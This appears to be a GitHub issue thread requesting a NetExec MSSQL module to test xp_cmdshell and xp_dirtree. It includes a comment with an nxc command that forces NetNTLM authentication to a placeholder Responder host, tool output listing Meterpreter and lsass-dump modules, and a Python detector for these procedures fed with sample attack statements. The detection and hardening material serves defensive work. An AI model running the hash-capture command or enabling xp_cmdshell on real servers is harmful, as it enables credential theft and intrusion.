[MSSQL] Add module/option for testing *xp_cmdshell* & *xp_dirtree* #261

Open
clem9669 opened this issue Apr 17, 2024 · 2 comments
@clem9669
Hi 👋

It would be very nice to have a module or an option for testing if:

  • xp_cmdshell is enabled or the current user has sufficient privileges
  • xp_dirtree can be used to grab NetNTLM authentication

```
$ netexec mssql -u 'MSSQLSERVER' -p 'X' -d certified.htb 10.129.236.111 -L
LOW PRIVILEGE MODULES
[*] mssql_priv                Enumerate and exploit MSSQL privileges

HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject                Downloads the Meterpreter stager and injects it into memory
[*] nanodump                  Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection           Pings a host
[*] web_delivery              Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
```

```
$ mssqlclient.py MSSQLSERVER:[email protected] -windows-auth

[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (CERTIFIEDDC\MSSQLSERVER  guest@master)> help

    enable_xp_cmdshell          - you know what it means
    disable_xp_cmdshell         - you know what it means
    xp_cmdshell {cmd}           - executes cmd using xp_cmdshell
    xp_dirtree {path}           - executes xp_dirtree on the path
```

Cheers 🚀

@NeffIsBack NeffIsBack added the enhancement New feature or request label Apr 18, 2024
@ville87

ville87 commented Dec 11, 2024

FYI: If anyone hasn't already figured out, you can do the xp_dirtree for hash capturing or relaying simply by running the query on the target(s):
```
nxc mssql -u user01 -p '<pw>' --dns-server 10.10.10.1 -d domain.tld -q 'EXEC xp_dirtree "\\<Responder-IP>\hellofromnxc"' /home/kali/mssql_targets.txt
```
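The two requests in this thread (checking whether xp_cmdshell is reachable, and the xp_dirtree UNC trick above) are also what a defender wants to spot in SQL Server audit data: `sp_configure 'xp_cmdshell', 1`, direct `xp_cmdshell` calls, and file-access procedures (`xp_dirtree`, `xp_fileexist`, `xp_subdirs`) pointed at a UNC path on a host that is not a known file server, since that is what makes the service account authenticate outbound. The following is an added detection example written for this issue, not NetExec code or anything from the thread; the log lines, logins, hostnames and the `TRUSTED_UNC_HOSTS` allowlist are all constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample (login, statement) pairs in the shape a SQL Server audit or
# sql_statement_completed Extended Event would record. Not real capture data.
SAMPLE_EVENTS = [
    ("svc_app", "EXEC master..xp_dirtree '\\\\fileserver01.domain.tld\\share'"),
    ("user01", 'EXEC xp_dirtree "\\\\192.0.2.10\\hellofromnxc"'),
    ("dba", "SELECT name FROM sys.tables"),
    ("user01", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"),
    ("svc_app", "EXEC master..xp_cmdshell 'whoami'"),
    ("user01", "exec xp_fileexist '\\\\192.0.2.10\\c$\\x.txt'"),
    ("dba", "EXEC xp_dirtree 'C:\\Windows\\Temp'"),
]

# Hypothetical allowlist: file servers the SQL Server is expected to reach over SMB.
TRUSTED_UNC_HOSTS = {"fileserver01.domain.tld"}

# Host component of a UNC path: two backslashes, then everything up to the
# next backslash, whitespace or quote.
UNC_RE = re.compile(r"\\\\([^\\\s'\"]+)")
FILE_PROC_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.I)
CMDSHELL_RE = re.compile(r"\bxp_cmdshell\b", re.I)
ENABLE_RE = re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1", re.I)


@dataclass
class Finding:
    login: str
    severity: str
    reason: str
    statement: str


def analyze(login, stmt, trusted=TRUSTED_UNC_HOSTS):
    """Return the findings for one audited statement (empty list if benign)."""
    if ENABLE_RE.search(stmt):
        # Enabling the option is the event to alert on; the string literal also
        # contains 'xp_cmdshell', so return here to avoid double-counting.
        return [Finding(login, "high", "xp_cmdshell enabled via sp_configure", stmt)]

    findings = []
    if CMDSHELL_RE.search(stmt):
        findings.append(Finding(login, "high", "xp_cmdshell execution", stmt))

    for m in FILE_PROC_RE.finditer(stmt):
        proc = m.group(1).lower()
        hosts = UNC_RE.findall(stmt)
        untrusted = [h for h in hosts if h.lower() not in trusted]
        if untrusted:
            findings.append(Finding(login, "high",
                                    f"{proc} to untrusted UNC host {','.join(untrusted)}", stmt))
        elif hosts:
            findings.append(Finding(login, "low", f"{proc} to trusted UNC host", stmt))
        else:
            # Local path: no outbound authentication, but still worth a record.
            findings.append(Finding(login, "medium", f"{proc} with local path", stmt))
    return findings


def scan(events, trusted=TRUSTED_UNC_HOSTS):
    """Run analyze() over (login, statement) pairs and flatten the results."""
    out = []
    for login, stmt in events:
        out.extend(analyze(login, stmt, trusted))
    return out


def summarize(findings):
    """Count findings per severity, e.g. {'high': 4, 'medium': 1, 'low': 1}."""
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.login:8} {f.reason}: {f.statement}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

On the prevention side the same two procedures are the ones a DBA would check directly: `SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'` shows whether the option is on, and the file-access procedures only matter for relay if the service account is allowed to make outbound SMB connections at all, so egress filtering on 445 from database hosts removes the class of issue rather than one query.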

@NeffIsBack (Contributor)

Oh yes, take a look at #456 :)

@NeffIsBack NeffIsBack added feature request and removed enhancement New feature or request labels Dec 11, 2024